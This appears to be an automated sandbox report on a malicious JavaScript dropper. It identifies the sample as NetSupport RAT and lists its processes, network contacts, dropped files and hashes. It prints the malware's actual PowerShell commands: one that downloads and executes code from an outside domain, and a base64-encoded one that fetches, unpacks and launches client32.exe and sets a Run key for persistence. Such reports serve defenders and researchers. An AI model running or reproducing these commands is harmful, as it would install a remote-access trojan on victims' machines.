Malware Analysis Report

2024-10-19 01:40

Sample ID 240207-lh7rasgecr
Target ARS17291729317291729.js
SHA256 2770b332ef571a1462e5a38778307106e16ba66dca58717fe40f6f76259b717b
Tags
netsupport persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2770b332ef571a1462e5a38778307106e16ba66dca58717fe40f6f76259b717b

Threat Level: Known bad

The file ARS17291729317291729.js was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-07 09:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-07 09:33

Reported

2024-02-07 09:36

Platform

win7-20231215-en

Max time kernel

119s

Max time network

123s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

Network

Country Destination Domain Proto
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
CA 67.43.225.106:443 assime.ca tcp

Files

memory/2804-4-0x000000001B410000-0x000000001B6F2000-memory.dmp

memory/2804-5-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

memory/2804-6-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

memory/2804-8-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2804-7-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2804-9-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2804-10-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

memory/2804-11-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2804-12-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2804-13-0x0000000002AD0000-0x0000000002B50000-memory.dmp

memory/2804-14-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-07 09:33

Reported

2024-02-07 09:36

Platform

win10v2004-20231215-en

Max time kernel

142s

Max time network

152s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\modem_gprs_modules = "C:\\Users\\Admin\\AppData\\Local\\modem_gprs_modules\\client32.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -ExeCUtIONPol bYPASS -W hI -eNco QwBoAEQASQByACAAJABlAE4AdgA6AEwATwBDAEEAbABhAHAAcABEAGEAVABhADsAIAAkAEcAMgBmAGYAdwAwAGMAPQBbAGIAeQB0AGUAWwBdAF0AQAAoADgAMAAsACAANwA1ACwAIAAzACwAIAA0ACkAOwAgACQAawBuAHMAUABVADIAQQA9ACcAaAB0AHQAcAA6AC8ALwBzAGEAawBhAGwAZQByAGEAbABvAC4AYwBvAG0ALwBjAGMAZQBhADIANgA4AGIALQA4ADcAMQA2AC0ANAA2AGIAZQAtADkAMQA0ADgALQAzAGUANgAxADQAYgAzADgAYQAwAGQAZgAuAHQAeAB0ACcAOwAgACQAMwBsAEsAYwBVAEgAWAA9ACcAagBHAGgAVAB5AG8AaQBDAC4AegBpAHAAJwA7ACAAJABYAEYAeABiADMAPQAnAG0AbwBkAGUAbQBfAGcAcAByAHMAXwBtAG8AZAB1AGwAZQBzACcAOwAgACQARABFAGYAZgBJAFMAPQBpAE4AVgBPAEsAZQAtAFcAZQBCAHIAZQBxAFUAZQBzAHQAIAAtAFUAcgBJACAAJABrAG4AcwBQAFUAMgBBACAALQBVAHMARQBiAEEAcwBJAEMAUABhAFIAUwBJAE4AZwA7ACAAJABCAG0ASgBOAGcANQBmAD0AJABEAEUAZgBmAEkAUwAuAGMAbwBuAFQAZQBOAHQAOwAgACQATgBUADYAVgBPAEUAPQAkAGUATgB2ADoATABPAEMAQQBsAGEAcABwAEQAYQBUAGEALAAgACQAWABGAHgAYgAzACAALQBqAG8AaQBOACAAJwBcACcAOwAgACQAYwBrAGEAdQA4AD0AIgAkAGUATgB2ADoATABPAEMAQQBsAGEAcABwAEQAYQBUAGEAXAAkADMAbABLAGMAVQBIAFgAIgA7ACAAJABQAHgASQBCAFgAcwBvAEYAPQBbAEMAbwBOAFYARQBSAHQAXQA6ADoAZgByAG8AbQBiAGEAUwBlADYANABTAFQAcgBpAE4ARwAoACQAQgBtAEoATgBnADUAZgApADsAIAAkAEgANQBMAHoAawBIAFQAPQAkAFAAeABJAEIAWABzAG8ARgAgAC0AUwBQAGwASQBUACAAJwAgACcAIAAtAEEAcwAgAFsAQgB5AHQARQBbAF0AXQA7ACAAJAAxAFkASwBnAHMAcwBuAD0AJABHADIAZgBmAHcAMABjACsAJABIADUATAB6AGsASABUADsAIABTAGMAIAAkADMAbABLAGMAVQBIAFgAIAAkADEAWQBLAGcAcwBzAG4AIAAtAEUATgBDAG8AZABpAE4AZwAgAEIAWQBUAGUAOwAgAEUAeABwAEEAbgBkAC0AQQBSAEMAaABJAHYAZQAgAC0AcABBAHQAaAAgACQAYwBrAGEAdQA4ACAALQBkAEUAUwBUAGkAbgBBAFQAaQBvAE4AUABhAHQASAAgACQATgBUADYAVgBPAEUAIAAtAGYAbwBSAEMARQA7ACAAUgBJACAAJAAzAGwASwBjAFUASABYADsAIABDAEQAIAAkAE4AVAA2AFYATwBFADsAIAAkAFIAcQBQAHQAUQBkAD0AIgB7ADAAfQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAIAAtAGYAIAAkAE4AVAA2AFYATwBFADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAATgBlAHcALQBJAFQARQBtAFAAcgBPAFAARQByAHQAeQAgAC0AUABhAFQASAAgACcASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAE0AZQAgACQAWABGAHgAYgAzACAALQBWAGEATABVAEUAIAAkAFIAcQBQAHQAUQBkACAALQBwAFIAbwBQAGUAcgBUAHkAVABZAFAARQAgACcAUwB0AHIAaQBuAGcAJwA7AA==

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

"C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 182.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 18.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
US 8.8.8.8:53 sakaleralo.com udp
DE 192.121.22.184:80 sakaleralo.com tcp
US 8.8.8.8:53 106.225.43.67.in-addr.arpa udp
US 8.8.8.8:53 184.22.121.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 createcgroup.com udp
GB 5.61.62.93:443 createcgroup.com tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
US 172.67.68.212:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 93.62.61.5.in-addr.arpa udp
US 8.8.8.8:53 212.68.67.172.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 232.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

memory/2124-0-0x000001C9A80B0000-0x000001C9A80D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t0sixysy.4ht.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2124-10-0x00007FFBAB2D0000-0x00007FFBABD91000-memory.dmp

memory/2124-12-0x000001C9A5F30000-0x000001C9A5F40000-memory.dmp

memory/2124-13-0x000001C9A5F30000-0x000001C9A5F40000-memory.dmp

memory/2124-11-0x000001C9A5F30000-0x000001C9A5F40000-memory.dmp

memory/2892-23-0x00007FFBAB2D0000-0x00007FFBABD91000-memory.dmp

memory/2892-24-0x00000298F5890000-0x00000298F58A0000-memory.dmp

memory/2892-26-0x00000298F7A10000-0x00000298F7A22000-memory.dmp

memory/2892-27-0x00000298F5880000-0x00000298F588A000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

MD5 a2b46c59f6e7e395d479b09464ecdba0
SHA1 92c132307dd21189b6d7912ddd934b50e50d1ec1
SHA256 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1
SHA512 4f4479ddcd9d0986aec3d789f9e14f9285e8d9d63a5b8f73c9e3203d3a53cd575b1e15edf0d5f640816bb7f25bd3501244e0f7c181a716a6804742ed2f1cf916

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.dll

MD5 5820a7b3f84d1465266b80882af2f16d
SHA1 20a826086b6554050e78e32ddb98de5c40fb8ad4
SHA256 a90112014cbf9903059a6f2bfc4aaac34cbc5516ae6d006dfa09275360f90bc6
SHA512 beea5508f8a32aa553ff2cb2ec57bef44ebad1846f743fec1169febdd7eb5badcf68afb91dc57899b84aad4d1faf28b32328304bd1583c0e47989dee9cf87fdd

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.DLL

MD5 d8c80f23784bb87f4f191ef51c5644c2
SHA1 f4dbf9b1b7d25af2f77554701b2b2d87cf0c5714
SHA256 ad92fbd28017da5cfe5f441abc16ca72d0ee50680b11396c791c6912ec691bf5
SHA512 10b0eb674b39af3d0a795ca83d06465d962a31e17e4ddf4cdda52e3eb3c2065b9c8f91ff4efc1b604857ee935cb89a2124414b092744b3ad202f64fed6071ba8

C:\Users\Admin\AppData\Local\modem_gprs_modules\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

memory/2892-71-0x00007FFBAB2D0000-0x00007FFBABD91000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICAPI.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Local\modem_gprs_modules\MSVCR100.dll

MD5 96376583083f19b05b3ea026d643a759
SHA1 5855e953a8f277f751a2f0e660e3d63b067efb2e
SHA256 dd9a42bf02a97990ced074a78c91709e5111c89e80a92b86aa00207f3adf1ba2
SHA512 318956260805761e99dfad127c76fd97d920b77f5df055936d546465ba845b5f72525e3a9bd1c2f3afe59d91ae64bb7a0b1a9399a4319589520336e379954548

C:\Users\Admin\AppData\Local\modem_gprs_modules\msvcr100.dll

MD5 b81466c844868a5cc3f51441dba0749c
SHA1 7838d8271450e95b5fa10a9f50039f1f7dc37931
SHA256 6549f8fb70689f44b11340dc7055f0c71f8009589f6d53e77e51f678a104e2de
SHA512 c89c72db647886a7d0f32a7eed62a01f9babe78c7902cb16f241898fb83637ac51016d654eb5b3983bdbe6848c9721972ae27ce994b3dc5866f87c17eb4e24b1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 512c6cab650bfda6ef2995f6b515ed6f
SHA1 fec40abf4f5d74ea7f8828cee83770e423203083
SHA256 84871d83ecd410fb4ddede63061d9c521d876d47a8ffdbb8609378447ba0d262
SHA512 638fffef25de1c3e850eb4f4668c4fdafed7bde042b130325daf323b45d2784916381b410219473b5bbacb4c11c6b8b7ab892b3d5695edb0b0a0785233e8e19b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2b24af1492f112d2e53cb7415fda39f
SHA1 dbfcee57242a14b60997bd03379cc60198976d85
SHA256 fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA512 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

memory/2124-80-0x00007FFBAB2D0000-0x00007FFBABD91000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.ini

MD5 2cd1a8115b7328756129052384e2eed6
SHA1 9458e9553d3d1f075ed09a06fda3f36136781704
SHA256 02ab893e7d31d7c3b18d27c3c4ef6e056da27cc6ad7efa76b8d4729403a067d2
SHA512 df5630c14f1400166ecbf0854a48616c939c0467634c427f8a287edc5c064c0d259b1cec0b02ae7aa31e21d1609ff31f4e11285160323f2c24fcb02de4e20455

C:\Users\Admin\AppData\Local\modem_gprs_modules\NSM.LIC

MD5 866c96ba2823ac5fe70130dfaaa08531
SHA1 892a656da1ea264c73082da8c6e5f5728abcb861
SHA256 6a7c99e4bd767433c25d6df8df81baa99c05dd24fa064e45c306ff4d954e1921
SHA512 0dafc66222bbfcb1558d9845ee4ddeb7a687561b08b86a07b66b120c22952a8082e041d9234d9c69c8ade5d4dae894d3f10afd7ba6dd3f057a08fb5d57c42112

C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

MD5 788c5e3bc18602ba15ad93d6c03a7207
SHA1 af86597423f64e6a6dc82ae76207beda512f410c
SHA256 61ecfbcc8d66f4b7d876b0193b895d3066487333bac985f90da661432ea12f7b
SHA512 0190c33420ed9557e0635db349ba4d04a0fcbcd9f57d09687fe51a7f68a14520bb2fd73ba9fe95da9556efab2d9578dd5da046d7313ed22872a1996f8a2e9455

C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

MD5 93f0e1f715d2494b261c256f3e9bd431
SHA1 1466546b8167f355f561a636eacf8d70f236ccd7
SHA256 c63f9343eaaf29c48e2d5fe00ac0149218d0bf80f55e151e4a07c9e385221622
SHA512 ffa75c323432a640790cbca82003ef4cdc36d3785f0e54fe2bf84b8fc1141e462db1082f3ae46ff6d01eef95959a6e1a606b6d9e2f6d1efd37393b8300980b28